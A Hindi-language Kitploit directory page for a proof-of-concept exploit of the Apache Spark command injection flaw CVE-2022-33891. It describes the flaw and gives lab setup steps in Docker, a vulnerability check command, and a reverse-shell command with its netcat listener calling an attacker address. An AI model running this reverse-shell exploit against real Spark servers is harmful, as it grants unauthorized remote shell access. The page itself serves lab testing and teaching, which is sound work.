Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-33891 — Apache Spark कमांड इंजेक्शन (CVE-2022-33891) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें चेक और रिवर्स शेल मोड शामिल हैं, जो अधिकृत सुरक्षा परीक्षण को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/asepsaepdin/cve-2022-33891
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

Apache Spark कमांड इंजेक्शन (CVE-2022-33891) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें चेक और रिवर्स शेल मोड शामिल हैं, जो अधिकृत सुरक्षा परीक्षण को सक्षम बनाता है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-33891 - Apache Spark कमांड इंजेक्शन भेद्यता

Python


⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए

मूल एक्सप्लॉइट लेखक

मूल PoC लेखक AkbarTrilaksana के बहुत आभारी हैं

विवरण

Apache Spark UI, कॉन्फ़िगरेशन विकल्प spark.acls.enable के माध्यम से ACLs सक्षम करने की संभावना प्रदान करता है। एक प्रमाणीकरण फ़िल्टर के साथ, यह जाँचता है कि क्या किसी उपयोगकर्ता के पास एप्लिकेशन को देखने या संशोधित करने की पहुँच अनुमतियाँ हैं। यदि ACLs सक्षम हैं, तो HttpSecurityFilter में एक कोड पथ किसी व्यक्ति को मनमाना उपयोगकर्ता नाम प्रदान करके प्रतिरूपण (impersonation) करने की अनुमति दे सकता है। एक दुर्भावनापूर्ण उपयोगकर्ता तब एक अनुमति जाँच फ़ंक्शन तक पहुँच सकता है जो अंततः उनके इनपुट के आधार पर एक Unix शेल कमांड बनाएगा और उसे निष्पादित करेगा। इसका परिणाम वर्तमान में जिस उपयोगकर्ता के रूप में Spark चल रहा है, उसी के रूप में मनमाना शेल कमांड निष्पादन होगा। यह Apache Spark संस्करण 3.0.3 और उससे पहले, संस्करण 3.1.1 से 3.1.2, और संस्करण 3.2.0 से 3.2.1 को प्रभावित करता है।


चरण गाइड

  1. सबसे पहले, रिपॉज़िटरी को क्लोन करें

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  2. डायरेक्टरी बदलें

    root@kitploit:~
    cd CVE-2022-33891
    
  3. निर्भरताएँ स्थापित करें:

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  4. कंटेनर को चालू होने दें

    root@kitploit:~
    docker compose up
    
  5. एक नए टर्मिनल में, कमांड चलाएँ

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  6. कंटेनर bash सत्र में, दर्ज करें:

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  7. वैकल्पिक रूप से, spark-defaults.conf की सामग्री को cat करके सुनिश्चित करें कि यह सही दिखती है।

  8. इंटरैक्टिव bash शेल से बाहर निकलें और अपनी docker-compose प्रक्रिया को Ctl-C करें।

  9. एक बार कंटेनर सुरक्षित रूप से बंद हो जाएँ, तो docker-compose up फिर से चलाएँ

    root@kitploit:~
    docker compose up
    
  10. जाँच करें कि क्या लक्ष्य असुरक्षित है:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  11. हमलावर के दृष्टिकोण से, इंटरैक्टिव शेल तक पहुँच प्राप्त करने के लिए दूरस्थ कोड निष्पादन महत्वपूर्ण है। इसलिए, निम्नलिखित कमांड निष्पादित करने से bash पर आधारित tcp पर एक telnet रिवर्स शेल हमलावर के सिस्टम पर पोर्ट 4444/tcp पर ट्रिगर हो जाएगा:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

श्रेय

  • https://github.com/AkbarTrilaksana/cve-2022-33891
  • https://nvd.nist.gov/vuln/detail/cve-2022-33891
टूल डाउनलोड करें